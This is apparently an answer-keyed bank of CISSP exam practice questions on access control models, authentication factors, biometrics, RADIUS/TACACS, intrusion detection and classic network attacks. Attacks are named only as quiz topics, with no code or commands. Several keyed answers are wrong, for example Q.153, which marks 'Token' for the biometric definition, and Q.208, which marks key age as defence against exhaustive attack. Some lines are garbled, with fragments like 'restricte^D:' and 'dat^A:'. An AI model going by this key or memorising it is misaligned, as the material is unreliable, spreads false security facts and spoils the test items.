B#CISSP2 Q.70:  The Lattice Based Access Control model was developed to deal mainly with ___________ in computer systems. 	^A: Access control	^B: Information flow	^C: Message routes	^D: Encryption
B#CISSP2 Q.71:  In the Lattice Based Access Control model, controls are applied to: 	^A: Scripts	^B: Objects	^C: Models	^D: Factors
C#CISSP2 Q.72:  With Discretionary access controls, who determines who has access and what privilege they have? 	^A: End users.	^B: None of the choices.	^C: Resource owners.	^D: Only the administrators.
A#CISSP2 Q.73:  What defines an imposed access control level? 	^A: MAC	^B: DAC	^C: SAC	^D: CAC
B#CISSP2 Q.74:  Under MAC, who can change the category of a resource? 	^A: All users.	^B: Administrators only.	^C: All managers.	^D: None of the choices.
A#CISSP2 Q.75:  Under MAC, who may grant a right of access that is explicitly forbidden in the access control policy? 	^A: None of the choices.	^B: All users.	^C: Administrators only.	^D: All managers.
B#CISSP2 Q.76:  You may describe MAC as: 	^A: Opportunistic	^B: Prohibitive	^C: None of the choices.	^D: Permissive	
B#CISSP2 Q.77:  Under MAC, which of the following is true? 	^A: All that is expressly permitted is forbidden.	^B: All that is not expressly permitted is forbidden.	^C: All that is not expressly permitted is not forbidden.	^D: None of the choices.
C#CISSP2 Q.78:  Under MAC, a clearance is a: 	^A: Sensitivity	^B: Subject	^C: Privilege	^D: Object
D#CISSP2 Q.79:  Under MAC, a file is a(n): 	^A: Privilege	^B: Subject	^C: Sensitivity	^D: Object
A#CISSP2 Q.80:  Under MAC, classification reflects: 	^A: Sensitivity	^B: Subject	^C: Privilege	^D: Object
A#CISSP2 Q.81:  MAC is used for: 	^A: Defining imposed access control level.	^B: Defining user preferences.	^C: None of the choices.	^D: Defining discretionary access control level.
C#CISSP2 Q.82:  With MAC, who may make decisions that bear on policy? 	^A: None of the choices.	^B: All users.	^C: Only the administrator.	^D: All users except guests.
A#CISSP2 Q.83:  With MAC, who may NOT make decisions that derive from policy? 	^A: All users except the administrator.	^B: The administrator.	^C: The power users.	^D: The guests.
B#CISSP2 Q.84:  Under the MAC control system, what is required? 	^A: Performance monitoring	^B: Labelling	^C: Sensing	^D: None of the choices
C#CISSP2 Q.85:  Access controls that are not based on the policy are characterized as: 	^A: Secret controls	^B: Mandatory controls	^C: Discretionary controls	^D: Corrective controls
A#CISSP2 Q.86:  DAC are characterized by many organizations as: 	^A: Need-to-know controls	^B: Preventive controls	^C: Mandatory adjustable controls	^D: None of the choices
C#CISSP2 Q.87:  Which of the following correctly describe DAC? 	^A: It is the most secure method.	^B: It is of the B2 class.	^C: It can extend beyond limiting which subjects can gain what type of access to which objects.	^D: It is of the B1 class.
B#CISSP2 Q.88:  Under DAC, a subjects rights must be ________ when it leaves an organization altogether. 	^A: recycled	^B: terminated	^C: suspended	^D: resumed
B#CISSP2 Q.89:  Audit trail is a category of what control? 	^A: System, Manual	^B: Detective, Technical	^C: User, Technical	^D: Detective, Manual
B#CISSP2 Q.90:  IDS is a category of what control? 	^A: Detective, Manual	^B: Detective, Technical	^C: User, Technical	^D: System, Manual
D#CISSP2 Q.91:  Which of the following is not a detective technical control? 	^A: Intrusion detection system	^B: Violation reports	^C: Honeypot	^D: None of the choices.
D#CISSP2 Q.92:  ________ Technical Controls warn of technical Access Control violations.	^A: Elusive	^B: Descriptive	^C: Corrective	^D: Detective
D#CISSP2 Q.93:  A two factor authentication method is considered as a: 	^A: Technical control	^B: Patching control	^C: Corrective control	^D: Logical control
B#CISSP2 Q.94:  Which of the following will you NOT consider as technical controls? 	^A: Access Control software	^B: Man trap	^C: Passwords	^D: Antivirus Software
B#CISSP2 Q.95:  ___________________ are the technical ways of restricting who or what can access system resources. 	^A: Preventive Manual Controls	^B: Detective Technical Controls	^C: Preventive Circuit Controls	^D: Preventive Technical Controls
B#CISSP2 Q.96:  Preventive Technical Controls is usually built: 	^A: By using MD5.	^B: Into an operating system.	^C: By security officer.	^D: By security administrator.
D#CISSP2 Q.97:  Preventive Technical Controls cannot: 	^A: Protect the OS from unauthorized modification.	^B: Protect confidential information from being disclosed to unauthorized persons.	^C: Protect the OS from unauthorized manipulation.	^D: Protect users from being monitored.
D#CISSP2 Q.98:  How do Preventive Technical Controls protect system integrity and availability? 	^A: By limiting the number of threads only.	^B: By limiting the number of system variables.	^C: By limiting the number of function calls only.	^D: By limiting the number of users and/or processes.
C#CISSP2 Q.99:  Sensor is: 	^A: Logical, Physical	^B: Corrective, Logical	^C: Detective, Physical	^D: Corrective, Physical
D#CISSP2 Q.100:  Motion detector is a feature of: 	^A: Corrective Logical Controls.	^B: Logical Physical Controls.	^C: Corrective Physical Controls.	^D: Detective Physical Controls.
A#CISSP2 Q.101:  Closed circuit TV is a feature of: 	^A: Detective Physical Controls	^B: Corrective Physical Controls	^C: Corrective Logical Controls	^D: Logical Physical Controls
B#CISSP2 Q.102:  Access control is the collection of mechanisms that permits managers of a system to exercise influence over the use of: 	^A: A man guard	^B: An IS system	^C: A threshold	^D: A Trap
B#CISSP2 Q.103:  Access control allows you to exercise directing influence over which of the following aspects of a system? 	^A: Behavior, user, and content provider.	^B: Behavior, use, and content.	^C: User logs and content.	^D: None of the choic es.
B#CISSP2 Q.104:  The principle of accountability is a principle by which specific action cab be traced back to: 	^A: A policy	^B: An individual	^C: A group	^D: A manager
C#CISSP2 Q.105:  The principle of _________ s a principle by which specific action can be traced back to anyone of yourusers. 	^A: Security	^B: Integrity	^C: Accountability	^D: Policy
D#CISSP2 Q.106:  According to the principle of accountability, what action should be traceable to a specific user? 	^A: Material	^B: Intangible	^C: Tangible	^D: Significant
C#CISSP2 Q.107:  A significant action has a state that enables actions on an ADP system to be traced to individuals who may then be held responsible. The action do NOT include: 	^A: Violations of security policy.	^B: Attempted violations of security policy.	^C: Non-violations of security policy.	^D: Attempted violations of allowed actions.
A#CISSP2 Q.108:  ____________ is the means by which the ability to do something with a computer resource is explicitly enabled or restricte^D: 	^A: Access control	^B: Type of access	^C: System resource	^D: Work permit
A#CISSP2 Q.109:  The ability to do something with a computer resource can be explicitly enabled or restricted through: 	^A: Physical and system-based controls.	^B: Theoretical and system-based controls.	^C: Mental and system-based controls.	^D: Physical and trap-based controls.
C#CISSP2 Q.110:  The main categories of access control do NOT include:	^A: Administrative Access Control	^B: Logical Access Control	^C: Random Access Control	^D: Physical Access Control
D#CISSP2 Q.111:  You have very strict Physical Access controls. At the same time you have loose Logical Access Controls. What is true about this setting? 	^A: None of the choices.	^B: It can 100% secure your environment.	^C: It may secure your environment.	^D: It may not secure your environment.
A#CISSP2 Q.112:  Which of the following is NOT a type of access control? 	^A: Intrusive	^B: Deterrent	^C: Detective	^D: Preventive
A#CISSP2 Q.113:  As a type of access control, which of the following asks for avoiding occurrence? 	^A: Preventive	^B: Deterrent	^C: Intrusive	^D: Detective
C#CISSP2 Q.114:  As a type of access control, which of the following asks for identifying occurrences? 	^A: Deterrent	^B: Preventive	^C: Detective	^D: Intrusive
C#CISSP2 Q.115:  As a type of access control, which of the following asks for discouraging occurrence? 	^A: Detective	^B: Intrusive	^C: Deterrent	^D: Preventive
C#CISSP2 Q.116:  As a type of access control, which of the following asks for restoring controls? 	^A: Deterrent	^B: Intrusive	^C: Corrective	^D: Preventive
A#CISSP2 Q.117:  What type of access control focuses on restoring resources? 	^A: Recovery	^B: Preventive	^C: Intrusive	^D: Corrective
C#CISSP2 Q.118:  What scheme includes the requirement that the system maintain the separation of duty requirement expressed in the access control triples? 	^A: Bella	^B: Lattice	^C: Clark-Wilson	^D: Bell-LaPadula
B#CISSP2 Q.119:  What is an access control model? 	^A: A formal description of access control ID specification.	^B: A formal description of security policy.	^C: A formal description of a sensibility label.	^D: None of the choices.
B#CISSP2 Q.120:  Which of the following is true about MAC? 	^A: It is more flexible than DAC.	^B: It is more secure than DAC.	^C: It is less secure than DAC.	^D: It is more scalable than DAC.
C#CISSP2 Q.121:  The access matrix model consists of which of the following parts? (Choose all that apply) 	^A: A function that returns an objects type.	^B: A list of subjects.	^C: All of the choices.	^D: A list of objects.
A#CISSP2 Q.122:  The access matrix model has which of the following common implementations? 	^A: Access control lists and capabilities.	^B: Access control lists.	^C: Capabilities.	^D: Access control list and availability.
B#CISSP2 Q.123:  What can be accomplished by storing on each subject a list of rights the subject has for every object? 	^A: Object	^B: Capabilities	^C: Key ring	^D: Rights
B#CISSP2 Q.124:  Which of the following is true regarding a secure access model? 	^A: Secure information cannot flow to a more secure user.	^B: Secure information cannot flow to a less secure user.	^C: Secure information can flow to a less secure user.	^D: None of the choices.
A#CISSP2 Q.125:  In the Information Flow Model, what relates two versions of the same object? 	^A: Flow	^B: State	^C: Transformation	^D: Successive points
D#CISSP2 Q.126:  In the Information Flow Model, what acts as a type of dependency? 	^A: State	^B: Successive points	^C: Transformation	^D: Flow
C#CISSP2 Q.127:  The lattice-based model aims at protecting against: 	^A: Illegal attributes.	^B: None of the choices.	^C: Illegal information flow among the entities.	^D: Illegal access rights
B#CISSP2 Q.128:  Which of the following are the components of the Chinese wall model? 	^A: Conflict if interest classes.	^B: All of the choices.	^C: Subject	^D: Company Datasets.
B#CISSP2 Q.129:  Which of the following correctly describe the difference between identification and authentication? 	^A: Authentication is a means to verify who you are, while identification is what you are authorized to perform.	^B: Identification is a means to verify who you are, while authentication is what you are authorized to perform.	^C: Identification is another name of authentication.	^D: Identification is the child process of authentication.
B#CISSP2 Q.130:  Identification establishes: 	^A: Authentication	^B: Accountability	^C: Authorization	^D: None of the choices.
A#CISSP2 Q.131:  Identification usually takes the form of: 	^A: Login ID.	^B: User password.	^C: None of the choices.	^D: Passphrase
D#CISSP2 Q.132:  Authentication is typically based upon: 	^A: Something you have.	^B: Something you know.	^C: Something you are.	^D: All of the choices.
B#CISSP2 Q.133:  A password represents: 	^A: Something you have.	^B: Something you know.	^C: All of the choices.	^D: Something you are.
C#CISSP2 Q.134:  A smart card represents: 	^A: Something you are.	^B: Something you know.	^C: Something you have.	^D: All of the choices.
A#CISSP2 Q.135:  Retinal scans check for: 	^A: Something you are.	^B: Something you have.	^C: Something you know.	^D: All of the choices.
D#CISSP2 Q.136:  Which of the following is the most commonly used check on something you know? 	^A: One time password	^B: Login phrase	^C: Retinal	^D: Password
A#CISSP2 Q.137:  Software generated password has what drawback? 	^A: Password not easy to remember.	^B: Password too secure.	^C: None of the choices.	^D: Password unbreakable.
B#CISSP2 Q.138:  Which of the following will you consider as most secure? 	^A: Password	^B: One time password	^C: Login phrase	^D: Login ID
C#CISSP2 Q.139:  What type of password makes use of two totally unrelated words? 	^A: Login phrase	^B: One time password	^C: Composition	^D: Login ID
D#CISSP2 Q.140:  Which of the following are the advantages of using passphrase? 	^A: Difficult to crack using brute force.	^B: Offers numerous characters.	^C: Easier to remember.	^D: All of the choices.
B#CISSP2 Q.141:  Which of the following is the correct account policy you should follow? 	^A: All of the choices.	^B: All active accounts must have a password.	^C: All active accounts must have a long and complex pass phrase.	^D: All inactive accounts must have a password.
B#CISSP2 Q.142:  On UNIX systems, passwords shall be kept: 	^A: In any location on behalf of root.	^B: In a shadow password file.	^C: In the /etc/passwd file.	^D: In root.
B#CISSP2 Q.143:  Which of the following are the correct guidelines of password deployment? 	^A: Passwords must be masked.	^B: All of the choices.	^C: Password must have a minimum of 8 characters.	^D: Password must contain a mix of both alphabetic and non-alphabetic characters.
A#CISSP2 Q.144:  Why would a 16 characters password not desirable? 	^A: Hard to remember	^B: Offers numerous characters.	^C: Difficult to crack using brute force.	^D: All of the choices.
C#CISSP2 Q.145:  Which of the following is NOT a good password deployment guideline? 	^A: Passwords must not be he same as user id or login id.	^B: Password aging must be enforced on all systems.	^C: Password must be easy to memorize.	^D: Passwords must be changed at least once every 60 days, depending on your environment.
B#CISSP2 Q.146:  Routing password can be restricted by the use of: 	^A: Password age	^B: Password history	^C: Complex password	^D: All of the choices
A#CISSP2 Q.147:  Which of the following is an effective measure against a certain type of brute force password attack? 	^A: Password used must not be a word found in a dictionary.	^B: Password history is used.	^C: Password reuse is not allowed.	^D: None of the choices.
D#CISSP2 Q.148:  Which of the following are measures against password sniffing? 	^A: Passwords must not be sent through email in plain text.	^B: Passwords must not be stored in plain text on any electronic media.	^C: You may store passwords electronically if it is encrypted.	^D: All of the choices.
B#CISSP2 Q.149:  What should you do immediately if the root password is compromised? 	^A: Change the root password.	^B: Change all passwords.	^C: Increase the value of password age.	^D: Decrease the value of password history.
B#CISSP2 Q.150:  Which of the following is the most secure way to distribute password? 	^A: Employees must send in an email before obtaining a password.	^B: Employees must show ip in person and present proper identification before obtaining a password.	^C: Employees must send in a signed email before obtaining a password.	^D: None of the choices.
C#CISSP2 Q.151:  Which of the following can be used to protect your system against brute force password attack? 	^A: Decrease the value of password history.	^B: Employees must send in a signed email before obtaining a password.	^C: After three unsuccessful attempts to enter a password, the account will be locked.	^D: Increase the value of password age.
C#CISSP2 Q.152:  You should keep audit trail on which of the following items? 	^A: Password usage.	^B: All unsuccessful logon.	^C: All of the choices.	^D: All successful logon.
B#CISSP2 Q.153:  What type of authentication takes advantage of an individuals unique physical characteristics in order to authenticate that persons identity? 	^A: Password	^B: Token	^C: Ticket Granting	^D: Biometric
A#CISSP2 Q.154:  Which of the following will you consider as the MOST secure way of authentication? 	^A: Biometric	^B: Password	^C: Token	^D: Ticket Granting
A#CISSP2 Q.155:  Biometric performance is most commonly measured in terms of: 	^A: FRR and FAR	^B: FAC and ERR	^C: IER and FAR	^D: FRR and GIC
B#CISSP2 Q.156:  What is known as the probability that you are not authenticated to access your account? 	^A: ERR	^B: FRR	^C: MTBF	^D: FAR
B#CISSP2 Q.157:  What is known as the chance that someone other than you is granted access to your account? 	^A: ERR	^B: FAR	^C: FRR	^D: MTBF
A#CISSP2 Q.158:  You are comparing biometric systems. Security is the top priority. A low ________ is most important in this regar^D: 	^A: FAR	^B: FRR	^C: MTBF	^D: ERR
D#CISSP2 Q.159:  The quality of finger prints is crucial to maintain the necessary: 	^A: FRR	^B: ERR and FAR	^C: FAR	^D: FRR and FAR
C#CISSP2 Q.160:  By requiring the user to use more than one finger to authenticate, you can: 	^A: Provide statistical improvements in EAR.	^B: Provide statistical improvements in MTBF.	^C: Provide statistical improvements in FRR.	^D: Provide statistical improvements in ERR.
B#CISSP2 Q.161:  Which of the following is being considered as the most reliable kind of personal identification? 	^A: Token	^B: Finger print	^C: Password	^D: Ticket Granting
D#CISSP2 Q.162:  Which of the following methods is more microscopic and will analyze the direction of the ridges of the fingerprints for matching? 	^A: None of the choices.	^B: Flow direct	^C: Ridge matching	^D: Minutia matching
B#CISSP2 Q.163:  Which of the following are the types of eye scan in use today? 	^A: Retinal scans and body scans.	^B: Retinal scans and iris scans.	^C: Retinal scans and reflective scans.	^D: Reflective scans and iris scans.
B#CISSP2 Q.164:  Which of the following eye scan methods is considered to be more intrusive? 	^A: Iris scans	^B: Retinal scans	^C: Body scans	^D: Reflective scans
B#CISSP2 Q.165:  Which of the following offers greater accuracy then the others? 	^A: Facial recognition	^B: Iris scanning	^C: Finger scanning	^D: Voice recognition
B#CISSP2 Q.166:  Which of the following are the valid categories of hand geometry scanning? 	^A: Electrical and image-edge detection.	^B: Mechanical and image-edge detection.	^C: Logical and image-edge detection.	^D: Mechanical and image-ridge detection.
A#CISSP2 Q.167:  In the world of keystroke dynamics, what represents the amount of time you hold down in a particular key? 	^A: Dwell time	^B: Flight time	^C: Dynamic time	^D: Systems time
B#CISSP2 Q.168:  In the world of keystroke dynamics, what represents the amount of time it takes a person to switch between keys? 	^A: Dynamic time	^B: Flight time	^C: Dwell time	^D: Systems time.
D#CISSP2 Q.169:  Which of the following are the benefits of Keystroke dynamics? 	^A: Low cost	^B: Unintrusive device	^C: Transparent	^D: All of the choices.
B#CISSP2 Q.170:  DSV as an identification method check against users: 	^A: Fingerprints	^B: Signature	^C: Keystrokes	^D: Facial expression
A#CISSP2 Q.171:  Signature identification systems analyze what areas of an individuals signature? 	^A: All of the choices EXCEPT the signing rate.	^B: The specific features of the signature.	^C: The specific features of the process of signing ones signature.	^D: The signature rate.
A#CISSP2 Q.172:  What are the advantages to using voice identification?	^A: All of the choices.	^B: Timesaving	^C: Reliability	^D: Flexibility
B#CISSP2 Q.173:  What are the methods used in the process of facial identification? 	^A: None of the choices.	^B: Detection and recognition.	^C: Scanning and recognition.	^D: Detection and scanning.
A#CISSP2 Q.174:  In the process of facial identification, the basic underlying recognition technology of facial identification involves: 	^A: Eigenfeatures of eigenfaces.	^B: Scanning and recognition.	^C: Detection and scanning.	^D: None of the choices.
C#CISSP2 Q.175:  Which of the following is a facial feature identification product that can employ artificial intelligence and can require the system to learn from experience? 	^A: All of the choices.	^B: Digital nervous system.	^C: Neural networking	^D: DSV
B#CISSP2 Q.176:  What is typically used to illustrate the comparative strengths and weaknesses of each biometric technology? 	^A: Decipher Chart	^B: Zephyr Chart	^C: Cipher Chart	^D: Zapper Chart
B#CISSP2 Q.177:  In terms of the order of effectiveness, which of the following technologies is the most affective? 	^A: Fingerprint	^B: Iris scan	^C: Keystroke pattern	^D: Retina scan
B#CISSP2 Q.178:  In terms of the order of effectiveness, which of the following technologies is the least effective? 	^A: Voice pattern	^B: Signature	^C: Keystroke pattern	^D: Hand geometry
C#CISSP2 Q.179:  In terms of the order of acceptance, which of the following technologies is the MOST accepted? 	^A: Hand geometry	^B: Keystroke pattern	^C: Voice Pattern	^D: Signature
D#CISSP2 Q.180:  In terms of the order of acceptance, which of the following technologies is the LEAST accepted? 	^A: Fingerprint	^B: Iris	^C: Handprint	^D: Retina patterns
C#CISSP2 Q.181:  Token, as a way to identify user, is subject to what type of error? 	^A: Token error	^B: Decrypt error	^C: Human error	^D: Encrypt error
C#CISSP2 Q.182:  Which of the following factors may render a token based solution unusable? 	^A: Token length	^B: Card size	^C: Battery lifespan	^D: None of the choices.
D#CISSP2 Q.183:  Memory only card works based on: 	^A: Something you have.	^B: Something you know.	^C: None of the choices.	^D: Something you know and something you have.
D#CISSP2 Q.184:  Which of the following is a disadvantage of memory only card? 	^A: High cost to develop.	^B: High cost to operate.	^C: Physically infeasible.	^D: Easy to counterfeit.
D#CISSP2 Q.185:  The word smart card has meanings of: 	^A: Personal identity token containing IC-s.	^B: Processor IC card.	^C: IC card with ISO 7816 interface.	^D: All of the choices.
C#CISSP2 Q.186:  Processor card contains which of the following components? 	^A: Memory and hard drive.	^B: Memory and flash.	^C: Memory and processor.	^D: Cache and processor.
D#CISSP2 Q.187:  Attacks on smartcards generally fall into what categories? 	^A: Physical attacks.	^B: Trojan Horse attacks.	^C: Logical attacks.	^D: All of the choices, plus Social Engineering attacks.
B#CISSP2 Q.188:  What type of attacks occurs when a smartcard is operating under normal physical conditions, but sensitive information is gained by examining the bytes going to and from the smartcard? 	^A: Physical attacks.	^B: Logical attacks.	^C: Trojan Horse attacks.	^D: Social Engineering attacks.
A#CISSP2 Q.189:  What type of attacks occurs when normal physical conditions are altered in order to gain access to sensitive information on the smartcard? 	^A: Physical attacks	^B: Logical attacks	^C: Trojan Horse attacks	^D: Social Engineering attacks
C#CISSP2 Q.190:  What type pf attacks occurs when a rouge application has been planted on an unsuspecting users workstation?	^A: Physical attacks	^B: Logical attacks	^C: Trojan Horse attacks	^D: Social Engineering attacks
A#CISSP2 Q.191:  What is an effective countermeasure against Trojan horse attack that targets smart cards?	^A: Singe-access device driver architecture.	^B: Handprint driver architecture.	^C: Fingerprint driver architecture.	^D: All of the choices.
C#CISSP2 Q.192:  Which of the following attacks could be the most successful when the security technology is properly implemented and configured? 	^A: Logical attacks	^B: Physical attacks	^C: Social Engineering attacks	^D: Trojan Horse attacks
A#CISSP2 Q.193:  What are the valid types of one time password generator? ^A: All of the choices.	^B: Transaction synchronous	^C: Synchronous/PIN synchronous	^D: Asynchronous/PIN asynchronous
A#CISSP2 Q.194:  What are the benefits of job rotation? 	^A: All of the choices.	^B: Trained backup in case of emergencies.	^C: Protect against fraud.	^D: Cross training to employees.
A#CISSP2 Q.195:  In order to avoid mishandling of media or information, you should consider to use: 	^A: Labeling	^B: Token	^C: Ticket	^D: SLL
A#CISSP2 Q.196:  In order to avoid mishandling of media or information, which of the following should be labeled? 	^A: All of the choices.	^B: Printed copies	^C: Tape	^D: Floppy disks
C#CISSP2 Q.197:  A method for a user to identify and present credentials only once to a system is known as: 	^A: SEC	^B: IPSec	^C: SSO	^D: SSL
A#CISSP2 Q.198:  Which of the following correctly describe the features of SSO? 	^A: More efficient log-on.	^B: More costly to administer.	^C: More costly to setup.	^D: More key exchanging involved.
B#CISSP2 Q.199:  What is a protocol used for carrying authentication, authorization, and configuration information between a Network Access Server and a shared Authentication Server? 	^A: IPSec	^B: RADIUS	^C: L2TP	^D: PPTP
C#CISSP2 Q.200:  RADIUS is de fined by which RFC? 	^A: 2168	^B: 2148	^C: 2138	^D: 2158
A#CISSP2 Q.201:  In a RADIUS architecture, which of the following acts as a client?	^A: A network Access Server.	^B: None of the choices.	^C: The end user.	^D: The authentic ation server.
C#CISSP2 Q.202:  In a RADIUS architecture, which of the following can ac as a proxy client? 	^A: The end user.	^B: A Network Access Server.	^C: The RADIUS authentication server.	^D: None of the choices.
D#CISSP2 Q.203:  What protocol was UDP based and mainly intended to provide validation of dial up user login passwords? 	^A: PPTP	^B: L2TP	^C: IPSec	^D: TACACS
C#CISSP2 Q.204:  Which of the following are proprietarily implemented by CISCO? 	^A: RADIUS+	^B: TACACS	^C: XTACACS and TACACS+	^D: RADIUS
B#CISSP2 Q.205:  In Unix, which file is required for you to set up an environment such that every used on the other host is a trusted user that can log into this host without authentication? 	^A: /etc/shadow	^B: /etc/host.equiv	^C: /etc/passwd	^D: None of the choices.
D#CISSP2 Q.206:  Information security is the protection of dat^A: Information will be protected mainly based on:	^A: Its sensitivity to the company.	^B: Its confidentiality.	^C: Its value.	^D: All of the choices.
B#CISSP2 Q.207:  Which of the following actions can increase the cost of an exhaustive attack? 	^A: Increase the age of a password.	^B: Increase the length of a password.	^C: None of the choices.	^D: Increase the history of a password.
C#CISSP2 Q.208:  Which of the following actions can make a cryptographic key more resistant to an exhaustive attack? 	^A: None of the choices.	^B: Increase the length of a key.	^C: Increase the age of a key.	^D: Increase the history of a key.
D#CISSP2 Q.209:  What attack involves actions to mimic ones identity? 	^A: Brute force	^B: Exhaustive	^C: Social engineering	^D: Spoofing
C#CISSP2 Q.210:  What attack takes advantage of operating system buffer overflows? 	^A: Spoofing	^B: Brute force	^C: DoS	^D: Exhaustive
C#CISSP2 Q.211:  What attack is primarily based on the fragmentation implementation of IP and large ICMP packet size? 	^A: Exhaustive	^B: Brute force	^C: Ping of Death	^D: Spoofing
C#CISSP2 Q.212:  Land attack attacks a target by: 	^A: Producing large volume of ICMP echos.	^B: Producing fragmented IP packets.	^C: Attacking an established TCP connection.	^D: None of the choices.
A#CISSP2 Q.213:  What attack is primarily based on the fragmentation implementation of IP? 	^A: Teardrop	^B: Exhaustive	^C: Spoofing	^D: Brute force
D#CISSP2 Q.214:  What attack floods networks with broadcast traffic so that the network is congested? 	^A: Spoofing	^B: Teardrop	^C: Brute force	^D: SMURF
D#CISSP2 Q.215:  What attack involves repeatedly sending identical e-massage to a particular address? 	^A: SMURF	^B: Brute force	^C: Teardrop	^D: Spamming
D#CISSP2 Q.216:  Which of the following attacks focus on cracking passwords? 	^A: SMURF	^B: Spamming	^C: Teardrop	^D: Dictionary
D#CISSP2 Q.217:  Man-in-the -middle attack is a real threat to what type of communication? 	^A: Communication based on random challenge.	^B: Communication based on face to face contact.	^C: Communication based on token.	^D: Communication based on asymmetric encryption.
B#CISSP2 Q.218:  Which of the following will you consider as a program that monitors data traveling over a network? 	^A: Smurfer	^B: Sniffer	^C: Fragmenter	^D: Spoofer
A#CISSP2 Q.219:  Individuals who have their sole aim as breaking into a computer system are being referred to as: 	^A: Crackers	^B: Sniffers	^C: Hackers	^D: None of the choices.
A#CISSP2 Q.220:  What technology is being used to detect anomalies? 	^A: IDS	^B: FRR	^C: Sniffing	^D: Capturing
C#CISSP2 Q.221:  IDSs verify, itemize, and characterize threats from:	^A: Inside your organizations network.	^B: Outside your organizations network.	^C: Outside and inside your organizations network.	^D: The Internet.
D#CISSP2 Q.222:  IDS can be described in terms of what fundamental functional components? 	^A: Response	^B: Information Sources	^C: Analysis	^D: All of the choices.
D#CISSP2 Q.223:  What are the primary goals of intrusion detection systems? 	^A: Accountability	^B: Availability	^C: Response	^D: All of the choices
A#CISSP2 Q.224:  What is the most common way to classify IDSs? 	^A: Group them by information source.	^B: Group them by network packets.	^C: Group them by attackers.	^D: Group them by signs of intrusion.
B#CISSP2 Q.225:  The majority of commercial intrusion detection systems are: 	^A: Identity-based	^B: Network-based	^C: Host-based	^D: Signature-based
A#CISSP2 Q.226:  Which of the following is a drawback of Network-based IDSs? 	^A: It cannot analyze encrypted information.	^B: It is very costly to setup.	^C: It is very costly to manage.	^D: It is not effective.
A#CISSP2 Q.227:  Host-based IDSs normally utilize information from which of the following sources? 	^A: Operating system audit trails and system logs.	^B: Operating system audit trails and network packets.	^C: Network packets and system logs.	^D: Operating system alarms and system logs.
A#CISSP2 Q.228:  When comparing host based IDS with network based ID, which of the following is an obvious	advantage? 	^A: It is unaffected by switched networks.	^B: It cannot analyze encrypted information.	^C: It is not costly to setup.	^D: It is not costly to manage.
D#CISSP2 Q.229:  You are comparing host based IDS with network based I^D: Which of the following will you consider as an obvious disadvantage of host based IDS? 	^A: It cannot analyze encrypted information.	^B: It is costly to remove.	^C: It is affected by switched networks.	^D: It is costly to manage.
B#CISSP2 Q.230:  Which of the following IDS inflict a higher performance cost on the monitored systems? 	^A: Encryption based	^B: Host based	^C: Network based	^D: Trusted based
D#CISSP2 Q.231:  Application-based IDSs normally utilize information from which of the following sources? 	^A: Network packets and system logs.	^B: Operating system audit trails and network packets.	^C: Operating system audit trails and system logs.	^D: Applications transaction log files.
A#CISSP2 Q.232:  What are the primary approaches IDS takes to analyze events to detect attacks? 	^A: Misuse detection and anomaly detection.	^B: Log detection and anomaly detection.	^C: Misuse detection and early drop detection.	^D: Scan detection and anomaly detection.
B#CISSP2 Q.233:  Misuse detectors analyze system activity and identify patterns. The patterns corresponding to know attacks are called: 	^A: Attachments	^B: Signatures	^C: Strings	^D: Identifications
C#CISSP2 Q.234:  Which of the following is an obvious disadvantage of deploying misuse detectors? 	^A: They are costly to setup.	^B: They are not accurate.	^C: They most be constantly updated with signatures of new attacks.	^D: They are costly to use.
C#CISSP2 Q.235:  What detectors identify abnormal unusual behavior on a host or network? 	^A: None of the choices.	^B: Legitimate detectors.	^C: Anomaly detectors.	^D: Normal detectors.
D#CISSP2 Q.236:  Which of the following are the major categories of IDSs response options? 	^A: Active responses	^B: Passive responses	^C: Hybrid	^D: All of the choices.
A#CISSP2 Q.237:  Alarms and notifications are generated by IDSs to inform users when attacks are detecte^D: The most common form of alarm is:	^A: Onscreen alert	^B: Email	^C: Pager	^D: Icq
A#CISSP2 Q.238:  Which of the following is a valid tool that complements IDSs? 	^A: All of the choices.	^B: Padded Cells	^C: Vulnerability Analysis Systems	^D: Honey Pots
B#CISSP2 Q.239:  What tool do you use to determine whether a host is vulnerable to known attacks? 	^A: Padded Cells	^B: Vulnerability analysis	^C: Honey Pots	^D: IDS
A#CISSP2 Q.240:  What tool is being used to determine whether attackers have altered system files of executables? 	^A: File Integrity Checker	^B: Vulnerability Analysis Systems	^C: Honey Pots	^D: Padded Cells
A#CISSP2 Q.241:  What is known as decoy system designed to lure a potential attacker away from critical systems?	^A: Honey Pots	^B: Vulnerability Analysis Systems	^C: File Integrity Checker	^D: Padded Cells
B#CISSP2 Q.242:  When the IDS detect attackers, the attackers are seamlessly transfe rred to a special host. This method is called: 	^A: Vulnerability Analysis Systems	^B: Padded Cell	^C: Honey Pot	^D: File Integrity Checker
D#CISSP2 Q.243:  Most computer attacks result in violation of which of the following security properties? 	^A: Availability	^B: Confidentiality	^C: Integrity and control	^D: All of the choices.
D#CISSP2 Q.244:  What types of computer attacks are most commonly reported by IDSs? 	^A: System penetration	^B: Denial of service	^C: System scanning	^D: All of the choices
D#CISSP2 Q.245:  What attack is typically used for identifying the topology of the target network? 	^A: Spoofing	^B: Brute force	^C: Teardrop	^D: Scanning
D#CISSP3 Q.1:  In a discretionary mode, which of the following entities is authorized to grant information access to other people?	^A: Manager	^B: Group leader	^C: Security manager	^D: User
C#CISSP3 Q.2:  Which DES mode of operation is best suited for database encryption?	^A: Cipher Block Chaining (CBC) mode	^B: Cycling Redundancy Checking (CRC) mode	^C: Electronic Code Book (ECB) mode	^D: Cipher Feedback (CFB) mode
B#CISSP3 Q.3:  Within the realm of IT security, which of the following combinations best defines risk?	^A: Threat coupled with a breach.	^B: Threat coupled with a vulnerability.	^C: Vulnerability coupled with an attack.	^D: Threat coupled with a breach of security.
B#CISSP3 Q.4:  Which of the following would be the best reason for separating the test and development environments?	^A: To restrict access to systems under test.	^B: To control the stability of the test environment.	^C: To segregate user and development staff.	^D: To secure access to systems under development.
A#CISSP3 Q.5:  Which of the following statements pertaining to dealing with the media after a disaster occurred and disturbed the organizations activities is incorrect?	^A: The CEO should always be the spokesperson for the company during a disaster.	^B: The disaster recover plan must include how the media is to be handled during the disaster.	^C: The organizations spokesperson should report bad news before the press gets a hold of it through another channel.	^D: An emergency press conference site should be planned ahead.			
B#CISSP3 Q.6:  Which Orange book security rating introduces security labels?	^A: C2	^B: B1	^C: B2	^D: B3
A#CISSP3 Q.7:  A Business Impact Analysis (BIA) does not:  	^A: Recommend the appropriate recovery solution.	^B: Determine critical and necessary business functions and their resource dependencies.	^C: Identify critical computer applications and the associated outage tolerance.	^D: Estimate the financial impact of a disruption.
